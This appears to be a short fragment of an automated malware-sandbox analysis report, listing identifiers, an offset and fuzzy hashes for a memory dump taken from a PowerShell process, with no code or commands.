                                                                                                    • Source File: 0000000B.00000002.2814822597.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_7be0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                    • API String ID: 0-2125118731
                                                                                                    • Opcode ID: a2b487e2f76d9cee89101f92452de9ca1aa3c0ddf857858b4e8c168411aa4e1f
                                                                                                    • Instruction ID: b7300956e896cca119beb3f0c1055b7ef5df82d2f23618f77d4d111740e7e5b0
                                                                                                    • Opcode Fuzzy Hash: a2b487e2f76d9cee89101f92452de9ca1aa3c0ddf857858b4e8c168411aa4e1f
                                                                                                    • Instruction Fuzzy Hash: FE2137F170471A6BFB384569DC00BA76B9EBBC4715F24846AA405CF381DE36C8C5C261